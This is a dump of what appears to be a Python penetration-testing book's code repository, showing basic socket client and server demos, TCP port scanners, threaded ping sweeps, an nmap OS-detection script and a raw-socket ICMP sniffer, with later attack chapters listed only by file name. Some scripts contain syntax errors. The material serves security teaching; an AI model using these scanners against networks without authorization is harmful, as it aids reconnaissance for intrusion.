├── Chapter01
└── first chapter _programs
│ ├── clientside
│ ├── client1.py
│ ├── client3.py.py
│ └── udp2.py
│ ├── connect_ex.py
│ ├── getadd1.py
│ ├── ips
│ ├── server1.py
│ ├── server2.py
│ ├── server3.py
│ ├── udp1.py
│ ├── udptime1.py
│ └── udptime2.py
├── Chapter02
├── .idea
│ ├── Chapter 2.iml
│ ├── inspectionProfiles
│ │ └── Project_Default.xml
│ ├── misc.xml
│ ├── modules.xml
│ └── workspace.xml
├── Chapter2_scanning.zip
└── Chapter2_scanning
│ └── Chapter2_scanning
│ ├── figures
│ ├── ipscanner_linux.JPG
│ ├── nmap_android.JPG
│ ├── nmap_linux.JPG
│ ├── nmap_windows.JPG
│ └── port.png
│ └── programs_2nd_chapter
│ ├── OS_detection.py
│ ├── creatdicnew.py
│ ├── ips.py
│ ├── iptcpscan.py
│ ├── iptcpscan_t.py
│ ├── iptcpscan_t_l.py
│ ├── mohit.raj
│ ├── mohit.raj_
│ ├── nmap_python1.py
│ ├── ping_sweep.py
│ ├── ping_sweep_send_rec.py
│ ├── ping_sweep_th.py
│ ├── ping_sweep_th_l.py
│ ├── port.txt
│ ├── port_description.dat
│ └── port_scanner15.py
├── Chapter03
├── .idea
│ ├── Chapter 3.iml
│ ├── inspectionProfiles
│ │ └── Project_Default.xml
│ ├── misc.xml
│ ├── modules.xml
│ └── workspace.xml
├── Chapter3_sniifing.zip
└── Chapter3_sniifing
│ └── Chapter3_sniifing
│ ├── .idea
│ ├── Chapter3_sniifing.iml
│ ├── misc.xml
│ ├── modules.xml
│ └── workspace.xml
│ └── Chapter_3_programs
│ ├── ack.py
│ ├── arpsp.py
│ ├── arpspex.py
│ ├── client side
│ └── unstruc.py
│ ├── eth.py
│ ├── fin.py
│ ├── halfopen.py
│ ├── netdiss.py
│ ├── pingofd.py
│ ├── sniffer1.py
│ ├── sniffer_new.py
│ ├── sniffer_ttl.py
│ ├── str1.py
│ └── struct1.py
├── Chapter04
└── Chapter4_network_attack_preventation.zip
├── Chapter05
└── wireless_chapter5.zip
├── Chapter06
└── chapter_6_honeypot_program.zip
├── Chapter07
└── foot-printing_programs
│ └── foot-printing_programs
│ ├── banner.py
│ ├── div1.py
│ ├── email_finder.py
│ ├── header.py
│ ├── info.py
│ ├── par3.py
│ ├── result.txt
│ ├── whois.py
│ └── whois5.py
├── Chapter08
└── Programs_client_Side
│ └── Programs_client_Side
│ ├── DDOS_detect1.py
│ ├── index.php
│ ├── mimp.py
│ ├── parameter temp.py
│ ├── simp.py
│ └── sisp.py
├── Chapter09
└── programs_pentest_SQL.zip
├── LICENSE
└── README.md
/Chapter01/first chapter _programs/clientside/client1.py:
--------------------------------------------------------------------------------
1 | import socket
2 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
3 | host = "192.168.5.6"
4 | port = 5610
5 | s.connect((host,port))
6 | #print s.recv(1024)
7 |
8 | s.send("Hello Server")
9 | s.close()
10 |
--------------------------------------------------------------------------------
/Chapter01/first chapter _programs/clientside/client3.py.py:
--------------------------------------------------------------------------------
1 | import socket
2 | host = "192.168.5.6"
3 | port = 5610
4 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
5 | s.connect((host, port))
6 | buf = bytearray("-" * 30) # buffer created
7 | print "Number of Bytes ",s.recv_into(buf)
8 | print buf
9 | s.close
10 |
--------------------------------------------------------------------------------
/Chapter01/first chapter _programs/clientside/udp2.py:
--------------------------------------------------------------------------------
1 | import socket
2 | host = "192.168.5.6"
3 | port = 5610
4 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
5 | print s.sendto("hello all",(host,port))
6 | s.close()
7 |
--------------------------------------------------------------------------------
/Chapter01/first chapter _programs/connect_ex.py:
--------------------------------------------------------------------------------
1 | import socket
2 |
3 | rmip =raw_input("192.168.5.6")
4 |
5 | st1= raw_input("Enter first port ")
6 | en1 = raw_input("Enter last port ")
7 |
8 |
9 |
10 | for port in xrange(st1, en1)
11 | sock= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
12 |
13 | result = sock.connect_ex((rmip,port))
14 | sock.setdefaulttimeout(1)
15 | if result == 0:
16 | print port, "--> Open"
17 | sock.close()
18 |
19 |
--------------------------------------------------------------------------------
/Chapter01/first chapter _programs/getadd1.py:
--------------------------------------------------------------------------------
1 | import socket
2 | def get_protnumber(prefix):
3 | return dict( (getattr(socket, a), a)
4 | for a in dir(socket)
5 | if a.startswith(prefix))
6 |
7 | proto_fam = get_protnumber('AF_')
8 | types = get_protnumber('SOCK_')
9 | protocols = get_protnumber('IPPROTO_')
10 |
11 | for res in socket.getaddrinfo('www.thapar.edu', 'http'):
12 |
13 | family, socktype, proto, canonname, sockaddr = res
14 |
15 | print 'Family :', proto_fam[family]
16 | print 'Type :', types[socktype]
17 | print 'Protocol :', protocols[proto]
18 | print 'Canonical name:', canonname
19 | print 'Socket address:', sockaddr
20 |
--------------------------------------------------------------------------------
/Chapter01/first chapter _programs/ips:
--------------------------------------------------------------------------------
1 | import os
2 | response = os.popen('ping -n 1 192.168.5.6')
3 | for line in response.readlines():
4 | print line,
5 |
--------------------------------------------------------------------------------
/Chapter01/first chapter _programs/server1.py:
--------------------------------------------------------------------------------
1 | import socket
2 | host = "192.168.5.6" #Server address
3 | port = 5610 #Port of Server
4 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
5 | s.bind((host,port)) #bind server
6 | s.listen(2)
7 | conn, addr = s.accept()
8 | print addr, "Now Connected"
9 | conn.send("Thank you for connecting")
10 | conn.close()
11 |
--------------------------------------------------------------------------------
/Chapter01/first chapter _programs/server2.py:
--------------------------------------------------------------------------------
1 | import socket
2 | host = "192.168.1.46"
3 | port = 4444
4 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
5 | s.bind((host,port))
6 | s.listen(2)
7 | while True:
8 | conn, addr = s.accept()
9 | print addr, "Now Connected"
10 | msz = raw_input("Enter the message ")
11 | conn.send(msz)
12 | print conn.recv(1024)
13 | conn.close()
14 |
--------------------------------------------------------------------------------
/Chapter01/first chapter _programs/server3.py:
--------------------------------------------------------------------------------
1 | import socket
2 | host = "192.168.5.6"
3 | port = 5610
4 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
5 | s.bind((host, port))
6 | s.listen(1)
7 | conn, addr = s.accept()
8 | print "connected by", addr
9 | conn.send("Thanks")
10 | conn.close()
11 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/Chapter01/first chapter _programs/udp1.py:
--------------------------------------------------------------------------------
1 | import socket
2 | host = "192.168.5.6"
3 | port = 5610
4 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
5 | s.bind((host,port))
6 | data, addr = s.recvfrom(1024)
7 | print "recevied from ",addr
8 | print "obtained ", data
9 | s.close()
10 |
--------------------------------------------------------------------------------
/Chapter01/first chapter _programs/udptime1.py:
--------------------------------------------------------------------------------
1 | import socket
2 | host = "192.168.5.6"
3 | port = 5610
4 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
5 | s.bind((host,port))
6 | s.settimeout(5)
7 | data, addr = s.recvfrom(1024)
8 | print "recevied from ",addr
9 | print "obtained ", data
10 | s.close()
11 |
--------------------------------------------------------------------------------
/Chapter01/first chapter _programs/udptime2.py:
--------------------------------------------------------------------------------
1 | import socket
2 | host = "192.168.5.6"
3 | port = 5610
4 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
5 | try:
6 |
7 | s.bind((host,port))
8 | s.settimeout(5)
9 | data, addr = s.recvfrom(1024)
10 | print "recevied from ",addr
11 | print "obtained ", data
12 | s.close()
13 |
14 | except socket.timeout :
15 | print "Client not connected"
16 | s.close()
17 |
--------------------------------------------------------------------------------
/Chapter02/.idea/Chapter 2.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/Chapter02/.idea/inspectionProfiles/Project_Default.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
11 |
12 |
13 |
--------------------------------------------------------------------------------
/Chapter02/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Chapter02/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Chapter02/.idea/workspace.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 |
197 |
198 |
199 |
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 |
220 |
221 |
222 |
223 |
224 |
225 |
226 |
227 |
228 |
229 |
230 |
231 |
232 |
233 |
234 |
235 |
236 |
237 |
238 |
239 |
240 |
241 |
242 |
243 |
244 | file://$PROJECT_DIR$/Chapter2_scanning/Chapter2_scanning/programs_2nd_chapter/ping_sweep_th_l.py
245 |
246 |
247 |
248 |
249 |
250 |
251 |
252 |
253 |
254 |
255 |
256 |
257 |
258 |
259 |
260 |
261 |
262 |
263 |
264 |
265 |
266 |
267 |
268 |
269 |
270 |
271 |
272 |
273 |
274 |
275 |
276 |
277 |
278 |
279 |
280 |
281 |
282 |
283 |
284 |
285 |
286 |
287 |
288 |
289 |
290 |
291 |
292 |
293 |
294 |
295 |
296 |
297 |
298 |
299 |
300 |
301 |
302 |
303 |
304 |
305 |
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Python-Penetration-Testing-Essentials-Second-Edition/f2a666b62826b4adc334a8e69ccbfe20b5cf12c2/Chapter02/Chapter2_scanning.zip
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/figures/ipscanner_linux.JPG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Python-Penetration-Testing-Essentials-Second-Edition/f2a666b62826b4adc334a8e69ccbfe20b5cf12c2/Chapter02/Chapter2_scanning/Chapter2_scanning/figures/ipscanner_linux.JPG
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/figures/nmap_android.JPG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Python-Penetration-Testing-Essentials-Second-Edition/f2a666b62826b4adc334a8e69ccbfe20b5cf12c2/Chapter02/Chapter2_scanning/Chapter2_scanning/figures/nmap_android.JPG
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/figures/nmap_linux.JPG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Python-Penetration-Testing-Essentials-Second-Edition/f2a666b62826b4adc334a8e69ccbfe20b5cf12c2/Chapter02/Chapter2_scanning/Chapter2_scanning/figures/nmap_linux.JPG
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/figures/nmap_windows.JPG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Python-Penetration-Testing-Essentials-Second-Edition/f2a666b62826b4adc334a8e69ccbfe20b5cf12c2/Chapter02/Chapter2_scanning/Chapter2_scanning/figures/nmap_windows.JPG
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/figures/port.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Python-Penetration-Testing-Essentials-Second-Edition/f2a666b62826b4adc334a8e69ccbfe20b5cf12c2/Chapter02/Chapter2_scanning/Chapter2_scanning/figures/port.png
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/programs_2nd_chapter/OS_detection.py:
--------------------------------------------------------------------------------
1 |
2 | import nmap, sys
3 | syntax="OS_detection.py "
4 | if len(sys.argv) == 1:
5 | print (syntax)
6 | sys.exit()
7 |
8 | host = sys.argv[1]
9 |
10 | nm=nmap.PortScanner()
11 | open_ports_dict = nm.scan(host, arguments="-O").get("scan").get(host).get("tcp")
12 | print "Open ports ", " Description"
13 | port_list = open_ports_dict.keys()
14 | port_list.sort()
15 | for port in port_list:
16 | print port, "---\t-->",open_ports_dict.get(port)['name']
17 | print "\n--------------OS detail---------------------\n"
18 | print "Details about the scanned host are: \t", nm[host]['osmatch'][0]['osclass'][0]['cpe']
19 | print "Operating system family is: \t\t", nm[host]['osmatch'][0]['osclass'][0]['osfamily']
20 | print "Type of OS is: \t\t\t\t", nm[host]['osmatch'][0]['osclass'][0]['type']
21 | print "Generation of Operating System :\t", nm[host]['osmatch'][0]['osclass'][0]['osgen']
22 | print "Operating System Vendor is:\t\t", nm[host]['osmatch'][0]['osclass'][0]['vendor']
23 | print "Accuracy of detection is:\t\t", nm[host]['osmatch'][0]['osclass'][0]['accuracy']
24 |
25 |
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/programs_2nd_chapter/creatdicnew.py:
--------------------------------------------------------------------------------
1 | import cPickle
2 | pickle_file = open("port_description.dat","w")
3 | file_name = raw_input("Enter the file name ")
4 | f = open(file_name,"r")
5 | dict1 = {}
6 | for line in f:
7 | key, value = line.split(':', 1)
8 |
9 | dict1[int(key.strip())] = value.strip()
10 |
11 | print "Dictionary is created"
12 | cPickle.dump(dict1,pickle_file)
13 | pickle_file.close()
14 | print "port_description.dat is created"
15 |
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/programs_2nd_chapter/ips.py:
--------------------------------------------------------------------------------
1 | import os
2 | response = os.popen('ping -n 1 192.168.5.6')
3 | for line in response.readlines():
4 | print line "hi"
5 |
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/programs_2nd_chapter/iptcpscan.py:
--------------------------------------------------------------------------------
1 | import socket
2 | from datetime import datetime
3 | net= raw_input("Enter the IP address ")
4 | net1= net.split('.')
5 | a = '.'
6 | net2 = net1[0]+a+net1[1]+a+net1[2]+a
7 | st1 = int(raw_input("Enter the Starting Number "))
8 | en1 = int(raw_input("Enter the Last Number "))
9 | en1=en1+1
10 | t1= datetime.now()
11 | def scan(addr):
12 | sock= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
13 | socket.setdefaulttimeout(1)
14 | result = sock.connect_ex((addr,445))
15 | if result==0:
16 | return 1
17 | else :
18 | return 0
19 |
20 | def run1():
21 | for ip in xrange(st1,en1):
22 | addr = net2+str(ip)
23 | if (scan(addr)):
24 | print addr , "is live"
25 |
26 | run1()
27 | t2= datetime.now()
28 | total =t2-t1
29 | print "scanning complete in " , total
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/programs_2nd_chapter/iptcpscan_t.py:
--------------------------------------------------------------------------------
1 | import threading
2 | import time
3 | import socket, subprocess,sys
4 | import thread
5 | import collections
6 | from datetime import datetime
7 | '''section 1'''
8 | net = raw_input("Enter the Network Address ")
9 | st1 = int(raw_input("Enter the starting Number "))
10 | en1 = int(raw_input("Enter the last Number "))
11 | en1=en1+1
12 | dic = collections.OrderedDict()
13 | net1= net.split('.')
14 | a = '.'
15 | net2 = net1[0]+a+net1[1]+a+net1[2]+a
16 | t1= datetime.now()
17 | '''section 2'''
18 | class myThread (threading.Thread):
19 | def __init__(self,st,en):
20 | threading.Thread.__init__(self)
21 | self.st = st
22 | self.en = en
23 | def run(self):
24 | run1(self.st,self.en)
25 |
26 | '''section 3'''
27 | def scan(addr):
28 | sock= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
29 | socket.setdefaulttimeout(1)
30 | result = sock.connect_ex((addr,135))
31 | if result==0:
32 | sock.close()
33 | return 1
34 | else :
35 | sock.close()
36 |
37 | def run1(st1,en1):
38 | for ip in xrange(st1,en1):
39 | addr = net2+str(ip)
40 | if scan(addr):
41 | dic[ip]= addr
42 | '''section 4'''
43 | total_ip =en1-st1
44 | tn =20 # number of ip handled by one thread
45 | total_thread = total_ip/tn
46 | total_thread=total_thread+1
47 | threads= []
48 | try:
49 | for i in xrange(total_thread):
50 | #print "i is ",i
51 | en = st1+tn
52 | if(en >en1):
53 | en =en1
54 | thread = myThread(st1,en)
55 | thread.start()
56 | threads.append(thread)
57 | st1 =en
58 | except:
59 | print "Error: unable to start thread"
60 | print "\tNumber of Threads active:", threading.activeCount()
61 | for t in threads:
62 | t.join()
63 | print "Exiting Main Thread"
64 | dict = collections.OrderedDict(sorted(dic.items()))
65 | for key in dict:
66 | print dict[key],"-->" "Live"
67 | t2= datetime.now()
68 | total =t2-t1
69 | print "scanning complete in " , total
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/programs_2nd_chapter/iptcpscan_t_l.py:
--------------------------------------------------------------------------------
1 | import threading
2 | import time
3 | import socket, subprocess,sys
4 | import thread
5 | import collections
6 | from datetime import datetime
7 | '''section 1'''
8 | net = raw_input("Enter the Network Address ")
9 | st1 = int(raw_input("Enter the starting Number "))
10 | en1 = int(raw_input("Enter the last Number "))
11 | en1=en1+1
12 | #dic = collections.OrderedDict()
13 | list1= []
14 | net1= net.split('.')
15 | a = '.'
16 | net2 = net1[0]+a+net1[1]+a+net1[2]+a
17 | t1= datetime.now()
18 | '''section 2'''
19 | class myThread (threading.Thread):
20 | def __init__(self,st,en):
21 | threading.Thread.__init__(self)
22 | self.st = st
23 | self.en = en
24 | def run(self):
25 | run1(self.st,self.en)
26 |
27 | '''section 3'''
28 | def scan(addr):
29 | sock= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
30 | socket.setdefaulttimeout(1)
31 | result = sock.connect_ex((addr,445))
32 | if result==0:
33 | sock.close()
34 | return 1
35 | else :
36 | sock.close()
37 |
38 | def run1(st1,en1):
39 | for ip in xrange(st1,en1):
40 | addr = net2+str(ip)
41 | if scan(addr):
42 | list1.append(addr)
43 | '''section 4'''
44 | total_ip =en1-st1
45 | tn =20 # number of ip handled by one thread
46 | total_thread = total_ip/tn
47 | total_thread=total_thread+1
48 | threads= []
49 | try:
50 | for i in xrange(total_thread):
51 | #print "i is ",i
52 | en = st1+tn
53 | if(en >en1):
54 | en =en1
55 | thread = myThread(st1,en)
56 | thread.start()
57 | threads.append(thread)
58 | st1 =en
59 | except:
60 | print "Error: unable to start thread"
61 | print "\tNumber of Threads active:", threading.activeCount()
62 | for t in threads:
63 | t.join()
64 | print "Exiting Main Thread"
65 |
66 | list1.sort()
67 | for k in list1 :
68 | print k,"-->" "Live"
69 | t2= datetime.now()
70 | total =t2-t1
71 | print "scanning complete in " , total
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/programs_2nd_chapter/mohit.raj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Python-Penetration-Testing-Essentials-Second-Edition/f2a666b62826b4adc334a8e69ccbfe20b5cf12c2/Chapter02/Chapter2_scanning/Chapter2_scanning/programs_2nd_chapter/mohit.raj
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/programs_2nd_chapter/mohit.raj_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Python-Penetration-Testing-Essentials-Second-Edition/f2a666b62826b4adc334a8e69ccbfe20b5cf12c2/Chapter02/Chapter2_scanning/Chapter2_scanning/programs_2nd_chapter/mohit.raj_
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/programs_2nd_chapter/nmap_python1.py:
--------------------------------------------------------------------------------
1 | import nmap
2 |
3 |
4 | def namp_scan():
5 | ip = "192.168.0.130"
6 | port_range = raw_input("Enter the port range:\t ")
7 | nm = nmap.PortScanner()
8 | nmap_info= nm.scan(ip, port_range)
9 | print "For IP address: ",ip ,"\n"
10 | if int(nmap_info['nmap']['scanstats']['uphosts']):
11 | for port in nm[ip]['tcp'].keys():
12 | print "Open Port:\t ",port,"\tDescription\t", nm[ip]['tcp'][port]['name']
13 |
14 | namp_scan()
15 |
16 |
17 | """
18 | {'status': {'state': 'up', 'reason': 'localhost-response'}, 'hostnames': [{'type': '', 'name': ''}], 'vendor': {}, 'addresses': {'ipv4': '192.168.0.1'}, 'tcp': {137: {'product': '', 'state': 'filtered', 'version': '', 'name': 'netbios-ns', 'conf': '3', 'extrainfo': '', 'reason': 'no-response', 'cpe': ''}, 139: {'product': 'Microsoft Windows netbios-ssn', 'state': 'open', 'version': '', 'name': 'netbios-ssn', 'conf': '10', 'extrainfo': '', 'reason': 'syn-ack', 'cpe': 'cpe:/o:microsoft:windows'}, 135: {'product': 'Microsoft Windows RPC', 'state': 'open', 'version': '', 'name': 'msrpc', 'conf': '10', 'extrainfo': '', 'reason': 'syn-ack', 'cpe': 'cpe:/o:microsoft:windows'}}}
19 |
20 | {'nmap': {'scanstats': {'uphosts': '1', 'timestr': 'Sun Mar 18 17:04:58 2018', 'downhosts': '0', 'totalhosts': '1', 'elapsed': '10.27'}, 'scaninfo': {'tcp': {'services': '22-443', 'method': 'syn'}}, 'command_line': 'nmap -oX - -p 22-443 -sV 127.0.0.1'}, 'scan':
21 |
22 | {'127.0.0.1': {'status': {'state': 'up', 'reason': 'localhost-response'}, 'hostnames': [{'type': 'PTR', 'name': 'localhost'}], 'vendor': {}, 'addresses': {'ipv4': '127.0.0.1'}, 'tcp': {137: {'product': '', 'state': 'filtered', 'version': '', 'name': 'netbios-ns', 'conf': '3', 'extrainfo': '', 'reason': 'no-response', 'cpe': ''}, 135: {'product': 'Microsoft Windows RPC', 'state': 'open', 'version': '', 'name': 'msrpc', 'conf': '10', 'extrainfo': '', 'reason': 'syn-ack', 'cpe': 'cpe:/o:microsoft:windows'}}}}}
23 | """
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/programs_2nd_chapter/ping_sweep.py:
--------------------------------------------------------------------------------
1 | import os
2 | import platform
3 | from datetime import datetime
4 | net = raw_input("Enter the IP address")
5 | net1= net.split('.')
6 | a = '.'
7 | net2 = net1[0]+a+net1[1]+a+net1[2]+a
8 | st1 = int(raw_input("Enter the Starting Number "))
9 | en1 = int(raw_input("Enter the Last Number "))
10 | en1=en1+1
11 | oper = platform.system()
12 |
13 | if (oper=="Windows"):
14 | ping1 = "ping -n 1 "
15 | elif (oper== "Linux"):
16 | ping1 = "ping -c 1 "
17 | else :
18 | ping1 = "ping -c 1 "
19 | t1= datetime.now()
20 | print "Scanning in Progress"
21 | for ip in xrange(st1,en1):
22 | addr = net2+str(ip)
23 | comm = ping1+addr
24 | response = os.popen(comm)
25 |
26 | print response.readlines()
27 | list1= response.readlines()[:]
28 | for line in list1:
29 | if(line.count("TTL")):
30 | print "hello "
31 | print addr, "--> Live"
32 | break
33 |
34 |
35 | t2= datetime.now()
36 | total =t2-t1
37 | print "scanning complete in " , total
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/programs_2nd_chapter/ping_sweep_send_rec.py:
--------------------------------------------------------------------------------
1 | import socket
2 | from datetime import datetime
3 | import ping
4 | import struct
5 | import binascii
6 | from threading import Thread
7 | import time
8 |
9 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(0x0800))
10 |
11 | net = raw_input("Enter the Network Address ")
12 | net1= net.rsplit('.',1)
13 | net2 = net1[0]+'.'
14 | start1 = int(raw_input("Enter the Starting Number "))
15 | end1 = int(raw_input("Enter the Last Number "))
16 | end1 =end1+1
17 |
18 | seq_ip = []
19 | total_ip =end1-start1
20 | tn =10 # number of ip handled by one thread
21 | total_thread = total_ip/tn
22 | total_thread=total_thread+1
23 | threads= []
24 | t1= datetime.now()
25 |
26 | def send_ping(st1,en1):
27 | for each in xrange(st1,en1):
28 | try:
29 | ip = net2+str(each)
30 | ping.do_one(ip,1,32)
31 | except Exception as e :
32 | print "Error in send_ping", e
33 |
34 | def icmp_sniff():
35 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)
36 |
37 | while True:
38 | pkt = s.recvfrom(2048)
39 | num = pkt[0][14].encode('hex')
40 | ip_length = (int(num) % 10) * 4
41 | ipheader = pkt[0][14:14+ip_length]
42 | icmp_h =pkt[0][14+ip_length]
43 | ip_hdr = struct.unpack("!8sBB2s4s4s",ipheader[:20])
44 | icmp_hdr = struct.unpack("!B",icmp_h)
45 | if(ip_hdr[2]==1) and (icmp_hdr[0]==0):
46 | ip = socket.inet_ntoa(ip_hdr[4])
47 | ip1= ip.rsplit('.',1)
48 | list_temp = [ip1[1].zfill(3),ip]
49 | seq_ip.append(list_temp)
50 |
51 | scan_thread = Thread(target=icmp_sniff)
52 | scan_thread.setDaemon(True)
53 | scan_thread.start()
54 | st1 = start1
55 |
56 | try:
57 | for i in xrange(total_thread):
58 | en = st1+tn
59 | if(en >end1):
60 | en =end1
61 | ping_thread = Thread(target=send_ping,args=(st1,en,) )
62 | ping_thread.start()
63 | threads.append(ping_thread)
64 | st1 =en
65 |
66 | except Exception as e :
67 | print "Error in Thread", e
68 |
69 | for t in threads:
70 | t.join()
71 | time.sleep(1)
72 | seq_ip.sort(key=lambda x: int(x[0]))
73 | print "S.no\t","IP"
74 | for each in seq_ip:
75 | print each[0]," ", each[1]
76 |
77 | t2= datetime.now()
78 | print "Time taken ", t2-t1
79 |
80 |
81 |
82 |
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/programs_2nd_chapter/ping_sweep_th.py:
--------------------------------------------------------------------------------
1 | import os
2 | import collections
3 | import platform
4 | import socket, subprocess,sys
5 | import threading
6 | from datetime import datetime
7 | ''' section 1 '''
8 |
9 | net = raw_input("Enter the Network Address ")
10 | net1= net.split('.')
11 | a = '.'
12 | net2 = net1[0]+a+net1[1]+a+net1[2]+a
13 | st1 = int(raw_input("Enter the Starting Number "))
14 | en1 = int(raw_input("Enter the Last Number "))
15 | en1 =en1+1
16 | dic = collections.OrderedDict()
17 | #dic = collections.OrderedDict()
18 | oper = platform.system()
19 |
20 | if (oper=="Windows"):
21 | ping1 = "ping -n 1 "
22 | elif (oper== "Linux"):
23 | ping1 = "ping -c 1 "
24 | else :
25 | ping1 = "ping -c 1 "
26 | t1= datetime.now()
27 | '''section 2'''
28 | class myThread (threading.Thread):
29 | def __init__(self,st,en):
30 | threading.Thread.__init__(self)
31 | self.st = st
32 | self.en = en
33 | def run(self):
34 | run1(self.st,self.en)
35 | '''section 3'''
36 | def run1(st1,en1):
37 | #print "Scanning in Progess"
38 | for ip in xrange(st1,en1):
39 | #print ".",
40 | addr = net2+str(ip)
41 | comm = ping1+addr
42 | response = os.popen(comm)
43 | for line in response.readlines():
44 | if(line.count("TTL")):
45 | break
46 | if (line.count("TTL")):
47 | #print addr, "--> Live"
48 | dic[ip]= addr
49 | ''' Section 4 '''
50 | total_ip =en1-st1
51 | tn =20 # number of ip handled by one thread
52 | total_thread = total_ip/tn
53 | total_thread=total_thread+1
54 | threads= []
55 | try:
56 | for i in xrange(total_thread):
57 | en = st1+tn
58 | if(en >en1):
59 | en =en1
60 | thread = myThread(st1,en)
61 | thread.start()
62 | threads.append(thread)
63 | st1 =en
64 | except:
65 | print "Error: unable to start thread"
66 | print "\tNumber of Threads active:", threading.activeCount()
67 |
68 | for t in threads:
69 | t.join()
70 | print "Exiting Main Thread"
71 | dict = collections.OrderedDict(sorted(dic.items()))
72 | for key in dict:
73 | print dict[key],"-->" "Live"
74 | t2= datetime.now()
75 | total =t2-t1
76 | print "scanning complete in " , total
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/programs_2nd_chapter/ping_sweep_th_l.py:
--------------------------------------------------------------------------------
1 | import os
2 | import collections
3 | import platform
4 | import socket, subprocess,sys
5 | import threading
6 | from datetime import datetime
7 | ''' section 1 '''
8 |
9 | net = raw_input("Enter the Network Address ")
10 | net1= net.split('.')
11 | a = '.'
12 | net2 = net1[0]+a+net1[1]+a+net1[2]+a
13 | st1 = int(raw_input("Enter the Starting Number "))
14 | en1 = int(raw_input("Enter the Last Number "))
15 | en1 =en1+1
16 | list1 = []
17 | oper = platform.system()
18 |
19 | if (oper=="Windows"):
20 | ping1 = "ping -n 1 "
21 | elif (oper== "Linux"):
22 | ping1 = "ping -c 1 "
23 | else :
24 | ping1 = "ping -c 1 "
